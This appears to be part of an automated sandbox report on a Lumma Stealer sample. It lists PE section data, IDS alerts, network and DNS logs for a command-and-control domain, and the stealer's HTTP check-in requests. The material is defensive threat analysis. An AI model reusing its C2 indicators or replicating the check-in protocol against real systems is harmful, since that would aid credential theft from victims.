                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x907500x4b.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x648.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xb40000x8
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x900000x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          :Mn-oI0x20000x8c98c0x8ca001ab09b14d3dbfdc059bd49fc2947560eFalse1.0003229166666667data7.999720145209283IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .text0x900000x1eff00x1f00072ad4c680ba28314ecf963c2be37a720False0.33025926159274194data4.699091743541759IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xb00000x6480x8008689ea0f3271b875c875b5a266292e7dFalse0.35009765625data3.5584555018467214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xb20000xc0x20049ba7a9e1e9d0fde8dd025f5fdb99dfeFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                          0xb40000x100x20054642790ec25e4b4619777896321dc7fFalse0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_VERSION0xb00a00x3bcdata0.42782426778242677
                                                                                          RT_MANIFEST0xb045c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-11-23T15:10:01.104987+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.33.116443TCP
                                                                                          2024-11-23T15:10:02.212063+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.33.116443TCP
                                                                                          2024-11-23T15:10:02.212063+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.33.116443TCP
                                                                                          2024-11-23T15:10:03.519144+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.33.116443TCP
                                                                                          2024-11-23T15:10:04.247214+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732104.21.33.116443TCP
                                                                                          2024-11-23T15:10:04.247214+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.33.116443TCP
                                                                                          2024-11-23T15:10:05.776218+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.33.116443TCP
                                                                                          2024-11-23T15:10:07.941534+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.33.116443TCP
                                                                                          2024-11-23T15:10:08.719900+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449737104.21.33.116443TCP
                                                                                          2024-11-23T15:10:10.120985+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.33.116443TCP
                                                                                          2024-11-23T15:10:12.511308+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.33.116443TCP
                                                                                          2024-11-23T15:10:14.988079+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.33.116443TCP
                                                                                          2024-11-23T15:10:18.531857+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.33.116443TCP
                                                                                          2024-11-23T15:10:19.241279+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746104.21.33.116443TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 23, 2024 15:09:59.883140087 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:09:59.883191109 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:09:59.883259058 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:09:59.886476040 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:09:59.886490107 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:01.104914904 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:01.104986906 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:01.109673977 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:01.109688044 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:01.109975100 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:01.159953117 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:01.469266891 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:01.469288111 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:01.469413996 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:02.212073088 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:02.212156057 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:02.212209940 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:02.214615107 CET49730443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:02.214627981 CET44349730104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:02.260185957 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:02.260271072 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:02.260365009 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:02.260618925 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:02.260653019 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:03.518970013 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:03.519144058 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:03.520622015 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:03.520656109 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:03.520903111 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:03.522027016 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:03.522073984 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:03.522120953 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.247198105 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.247263908 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.247293949 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.247328997 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.247378111 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.247431040 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.247447014 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.255078077 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.255125999 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.255141973 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.263561010 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.263612986 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.263629913 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.316181898 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.316215038 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.363059998 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.366835117 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.409934998 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.409957886 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.448012114 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.448108912 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.448132038 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.448156118 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.448331118 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.454929113 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.454966068 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.454994917 CET49732443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.455013037 CET44349732104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.559720039 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.559768915 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:04.559865952 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.560204029 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:04.560235023 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:05.776143074 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:05.776217937 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:05.777612925 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:05.777636051 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:05.777983904 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:05.784682035 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:05.784806967 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:05.784858942 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:05.784941912 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:05.784959078 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:06.616334915 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:06.616446972 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:06.616513968 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:06.616631031 CET49734443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:06.616658926 CET44349734104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:06.680558920 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:06.680619955 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:06.680697918 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:06.680960894 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:06.680998087 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:07.941416979 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:07.941534042 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:07.942811966 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:07.942837000 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:07.943181038 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:07.944422960 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:07.944586039 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:07.944633007 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:08.719927073 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:08.720046997 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:08.720113993 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:08.720180035 CET49737443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:08.720232964 CET44349737104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:08.905828953 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:08.905881882 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:08.905973911 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:08.906431913 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:08.906471968 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:10.120862961 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:10.120985031 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:10.122045040 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:10.122075081 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:10.122416019 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:10.129122972 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:10.129287958 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:10.129338026 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:10.129420996 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:10.129437923 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:10.995233059 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:10.995347977 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:10.995410919 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:10.995512009 CET49739443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:10.995539904 CET44349739104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:11.221872091 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:11.221910954 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:11.221982956 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:11.222280979 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:11.222295046 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:12.511120081 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:12.511307955 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:12.512429953 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:12.512438059 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:12.512753963 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:12.520781994 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:12.520878077 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:12.520881891 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:13.261084080 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:13.261193991 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:13.261249065 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:13.261347055 CET49741443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:13.261363983 CET44349741104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:13.682235003 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:13.682269096 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:13.682342052 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:13.682617903 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:13.682634115 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:14.987919092 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:14.988079071 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:14.989691973 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:14.989700079 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:14.989911079 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.003196001 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.004092932 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.004127979 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.004389048 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.004415035 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.005047083 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.005091906 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.005233049 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.005261898 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.005415916 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.005446911 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.005650997 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.005677938 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.005686045 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.005702019 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.005861044 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.005893946 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.005911112 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.006392956 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.006422043 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.051327944 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.051523924 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.051548958 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.051568985 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.051587105 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.051601887 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.051609993 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:15.051635981 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:15.051646948 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:17.291263103 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:17.291394949 CET44349743104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:17.291529894 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:17.291567087 CET49743443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:17.315634012 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:17.315686941 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:17.315767050 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:17.316055059 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:17.316083908 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:18.531761885 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:18.531857014 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:18.533045053 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:18.533078909 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:18.533437014 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:18.534847975 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:18.534888029 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:18.534940958 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:19.241282940 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:19.241364956 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:19.241446018 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:19.242288113 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:19.242335081 CET44349746104.21.33.116192.168.2.4
                                                                                          Nov 23, 2024 15:10:19.242367029 CET49746443192.168.2.4104.21.33.116
                                                                                          Nov 23, 2024 15:10:19.242382050 CET44349746104.21.33.116192.168.2.4
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 23, 2024 15:09:59.736027002 CET6538553192.168.2.41.1.1.1
                                                                                          Nov 23, 2024 15:09:59.876187086 CET53653851.1.1.1192.168.2.4
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Nov 23, 2024 15:09:59.736027002 CET192.168.2.41.1.1.10xdbf2Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Nov 23, 2024 15:09:59.876187086 CET1.1.1.1192.168.2.40xdbf2No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                          Nov 23, 2024 15:09:59.876187086 CET1.1.1.1192.168.2.40xdbf2No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                          • property-imper.sbs
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.449730104.21.33.1164437700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-23 14:10:01 UTC265OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 8
                                                                                          Host: property-imper.sbs
                                                                                          2024-11-23 14:10:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                          Data Ascii: act=life
                                                                                          2024-11-23 14:10:02 UTC1020INHTTP/1.1 200 OK
                                                                                          Date: Sat, 23 Nov 2024 14:10:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=cold0k4j4idcpfdsv2rlrka124; expires=Wed, 19-Mar-2025 07:56:40 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8oXSKYOVnW8n60ZsQK9CERxFYw68Xol1%2F0Qvv%2BBbTY9yk%2Fe236GdYa%2FGaBX2S4hOcHakNiM%2Bl9pjwBr22j044aQXpUgWXLjKXBbUqoEqcl%2BKS0ZkR8VbTdawbZCVTzFU97bAasw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e71bd882f1b4232-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1629&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1759036&cwnd=205&unsent_bytes=0&cid=3a9b3ac31200770e&ts=1118&x=0"
                                                                                          2024-11-23 14:10:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                          Data Ascii: 2ok
                                                                                          2024-11-23 14:10:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.449732104.21.33.1164437700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-23 14:10:03 UTC266OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 52
                                                                                          Host: property-imper.sbs
                                                                                          2024-11-23 14:10:03 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 37 35 35 30 37 26 6a 3d
                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6642475507&j=
                                                                                          2024-11-23 14:10:04 UTC1011INHTTP/1.1 200 OK
                                                                                          Date: Sat, 23 Nov 2024 14:10:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=dhodt07qem4gpne6muirj74c68; expires=Wed, 19-Mar-2025 07:56:42 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s9Axxr8kULaOLkTys7Qkvln7TpZJQ6sQj%2BsPkVOSFbR4e1AyweiikOWgWTG9uILBcPqH6ZmCC258ZXph4XWKusaFuAxaXVcoHG%2FXmPBOaycktqELPMOnzyktmRI096W6zDxmaro%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e71bd95b99f43cd-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2164&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1345002&cwnd=252&unsent_bytes=0&cid=e8e2cbb2eccff936&ts=734&x=0"
